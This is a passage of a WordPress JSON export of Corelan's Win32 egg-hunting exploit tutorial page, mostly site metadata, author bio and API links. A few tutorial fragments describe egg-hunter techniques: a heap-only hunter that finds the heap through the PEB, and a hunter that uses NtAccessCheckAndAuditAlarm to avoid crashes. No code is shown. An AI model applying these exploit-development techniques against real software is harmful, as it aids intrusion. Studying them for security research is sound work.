-content\/uploads\/2010\/01\/image_thumb30.png","contentUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb30.png"},{"@type":"BreadcrumbList","@id":"https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.corelan.be\/"},{"@type":"ListItem","position":2,"name":"Exploit writing tutorial part 8 : Win32 Egg Hunting"}]},{"@type":"WebSite","@id":"https:\/\/www.corelan.be\/#website","url":"https:\/\/www.corelan.be\/","name":"Corelan CyberSecurity Research","description":"Corelan publishes in-depth tutorials on exploit development, Windows exploitation, vulnerability research, heap internals, reverse engineering and security tooling used by professionals worldwide.","publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.corelan.be\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.corelan.be\/#organization","name":"Corelan CyberSecurity Research","url":"https:\/\/www.corelan.be\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/","url":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","contentUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","width":200,"height":200,"caption":"Corelan CyberSecurity Research"},"image":{"@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/corelanconsulting","https:\/\/x.com\/corelanc0d3r","https:\/\/x.com\/corelanconsulting","https:\/\/instagram.com\/corelanconsult"]},{"@type":"Person","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f","name":"corelanc0d3r","pronouns":"he\/him","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","url":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","caption":"corelanc0d3r"},"description":"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.","sameAs":["https:\/\/www.corelan-training.com","https:\/\/instagram.com\/corelanc0d3r","https:\/\/www.linkedin.com\/in\/petervaneeckhoutte\/","https:\/\/x.com\/corelanc0d3r"],"url":"https:\/\/www.corelan.be\/index.php\/author\/admin0\/"}]}},"views":101142,"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/2677","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/comments?post=2677"}],"version-history":[{"count":0,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/2677\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/media?parent=2677"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/categories?post=2677"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/tags?post=2677"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\"image\"<\/a><\/p>\n
\"image\"<\/a><\/p>\n
\"image\"<\/a><\/p>\n
- find the beginning of the heap and put that value in EDI (in fact, get PEB at TEB+0x30 and then get all process heaps at PEB+0x90). Check this document<\/a> for more info on building a heap only egg hunter<\/p>\n
Instead of using NtDisplayString, it uses NtAccessCheckAndAuditAlarm (offset 0x02 in the KiServiceTable) to prevent access violations from taking over your egg hunter. More info about NtAccessCheck can be found here<\/a> and here.\u00a0 Also, my friend Lincoln created a nice video about this egg hunter : watch the video here<\/p>\n